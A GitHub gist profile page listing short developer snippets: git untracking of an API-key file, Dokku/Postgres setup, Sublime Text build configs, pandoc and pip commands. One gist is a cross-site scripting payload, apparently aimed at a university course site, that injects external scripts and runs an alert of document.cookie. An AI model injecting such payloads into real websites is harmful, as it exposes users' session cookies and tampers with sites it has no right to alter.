Skip to content

Instantly share code, notes, and snippets.

View lopezjurip's full-sized avatar
🎯
Focusing

Patricio López Juri lopezjurip

🎯
Focusing
View GitHub Profile
@lopezjurip
lopezjurip / gist:618b053b9ab1f948f1b2
Created February 3, 2015 13:10
Commit file and stop tracking
// Lets say we have a file with path 'Project/Private/APIKEYS.txt'
git add Project/Private/APIKEYS.txt
git commit -m "added empty APIKEY file"
git push origin master
// Stop tracking
git update-index --assume-unchanged Project/Private/APIKEYS.txt
// Track again
@lopezjurip
lopezjurip / gist:0634262b5bb070684626
Created February 9, 2015 16:07
Dokker + Postgres, avoiding "PG::ConnectionBad: could not connect to server: Connection refused"
# Create database, save Url for later use, let's call it <saved_url>
dokku postgresql:create <database>
# Link
dokku postgresql:link <app_name> <database>
# Check db url
dokku config <app_name> | grep DATABASE_URL
# if saved url is not equals to the last displayed, then:
@lopezjurip
lopezjurip / gist:97771781262c18a24521
Last active August 29, 2015 14:20
Inyectar Nyancat al Siding (UC)
Este código no es mio.
Autor: Desconocido
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.4.min.js"></script><br />
<script>//<br />
// Este iframe fallaba<br />
//<iframe src="http://nyan.cat/" width="640" height="480"></iframe><br />
console.log("js injection ");//<br />
var url = "https://raw.github.com/jfix/nyancat/master";//<br />
var keyCode = 16; // shift key<br />
<script>javascript:alert(document.cookie);</script>
@lopezjurip
lopezjurip / macro.sh
Created May 24, 2015 23:57
[Bash] For-each on directories
START_HERE="/Users/user/repositories";
cd $START_HERE;
for d in $(find . -maxdepth 1 -mindepth 1 -type d); do
echo -e "$d";
cd $d;
# Do a barrel roll
git pull;
@lopezjurip
lopezjurip / JavaScript.sublime-build
Created June 3, 2015 03:20
Sublime Text 3 - JavaScript ES6 build (OSX)
{
"cmd": ["/usr/local/bin/node", "--harmony", "--use-strict", "$file"],
"selector": "source.js"
}
@lopezjurip
lopezjurip / Python3.sublime-build
Last active August 29, 2015 14:22
Sublime Text 3 - Python3 (OSX)
{
"cmd": ["python3", "-u", "$file"],
"selector": "source.python",
"file_regex": "file \"(...*?)\", line ([0-9]+)",
"encoding": "utf8"
}
@lopezjurip
lopezjurip / TypeScript.sublime-build
Created June 3, 2015 03:37
Sublime Text 3 - TypeScript ES6 (OSX)
{
"cmd": ["tsc", "--target ES6", "--declaration", "--module amd", "--sourceMap", "$file"],
"selector": "source.ts"
}
@lopezjurip
lopezjurip / Markdownt to Tex
Created June 8, 2015 02:58
[Pandoc] Markdown to PDF
pandoc --from=markdown_github --highlight-style=tango --output=README.tex README.md --to=latex --standalone
@lopezjurip
lopezjurip / script.sh
Created September 1, 2015 15:04
Update and clean pip packages
pip3 install --upgrade pip; pip install --upgrade pip; pip freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U; pip3 freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip3 install -U; rm -rf ~/Library/Caches/pip